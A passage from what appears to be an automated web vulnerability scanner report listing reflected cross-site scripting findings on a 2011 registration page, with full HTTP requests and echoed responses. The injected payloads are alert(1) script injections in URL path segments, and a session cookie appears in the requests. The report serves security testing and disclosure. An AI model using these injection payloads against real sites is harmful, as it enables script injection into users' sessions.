Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/flagsba152;alert(1)//0877ec22dea/gif/jp.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.158. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f03bf"-alert(1)-"dcb279790c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flagsf03bf"-alert(1)-"dcb279790c0/gif/jp.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:24:35 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/flagsf03bf"-alert(1)-"dcb279790c0/gif/jp.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.159. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 864d5"-alert(1)-"fed4153d35d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif864d5"-alert(1)-"fed4153d35d/jp.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:26:57 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/flags/gif864d5"-alert(1)-"fed4153d35d/jp.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.160. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8de2b%3balert(1)//b495f829b9f was submitted in the REST URL parameter 5. This input was echoed as 8de2b;alert(1)//b495f829b9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif8de2b%3balert(1)//b495f829b9f/jp.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:27:08 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/flags/gif8de2b;alert(1)//b495f829b9f/jp.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.161. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1e82f%3balert(1)//7b7b9d040ef was submitted in the REST URL parameter 6. This input was echoed as 1e82f;alert(1)//7b7b9d040ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif1e82f%3balert(1)//7b7b9d040ef HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:27:53 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/flags/gif/jp.gif1e82f;alert(1)//7b7b9d040ef?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.162. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 968d4"-alert(1)-"3e0231fd4c3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif968d4"-alert(1)-"3e0231fd4c3 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:27:46 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/flags/gif/jp.gif968d4"-alert(1)-"3e0231fd4c3?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.163. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c817"-alert(1)-"1c3e9f606d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C2c817"-alert(1)-"1c3e9f606d3/images/i.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:05:23 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<2c817"-alert(1)-"1c3e9f606d3/images/i.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.164. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 265d6"><script>alert(1)</script>72f5cd3ab87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/265d6"><script>alert(1)</script>72f5cd3ab87/images/i.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:01:04 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/265d6"><script>alert(1)</script>72f5cd3ab87/images/i.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.165. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 62291%3balert(1)//7f394d80862 was submitted in the REST URL parameter 2. This input was echoed as 62291;alert(1)//7f394d80862 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C62291%3balert(1)//7f394d80862/images/i.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:10:44 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<62291;alert(1)//7f394d80862/images/i.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.166. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86533"-alert(1)-"7cff52bad78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images86533"-alert(1)-"7cff52bad78/i.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:11:32 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images86533"-alert(1)-"7cff52bad78/i.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.167. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b1fe9%3balert(1)//55dff5e2e6e was submitted in the REST URL parameter 3. This input was echoed as b1fe9;alert(1)//55dff5e2e6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/imagesb1fe9%3balert(1)//55dff5e2e6e/i.gif HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:13:45 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</imagesb1fe9;alert(1)//55dff5e2e6e/i.gif?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.168. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6d520%3balert(1)//44841a0c230 was submitted in the REST URL parameter 4. This input was echoed as 6d520;alert(1)//44841a0c230 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif6d520%3balert(1)//44841a0c230 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:18:14 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/i.gif6d520;alert(1)//44841a0c230?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.169. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f6c0"-alert(1)-"a6c7cdc283f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif6f6c0"-alert(1)-"a6c7cdc283f HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:15:24 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/i.gif6f6c0"-alert(1)-"a6c7cdc283f?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.170. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 49fc1%3balert(1)//e5f7179fe3b was submitted in the REST URL parameter 2. This input was echoed as 49fc1;alert(1)//e5f7179fe3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C49fc1%3balert(1)//e5f7179fe3b/images/icons/accept.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
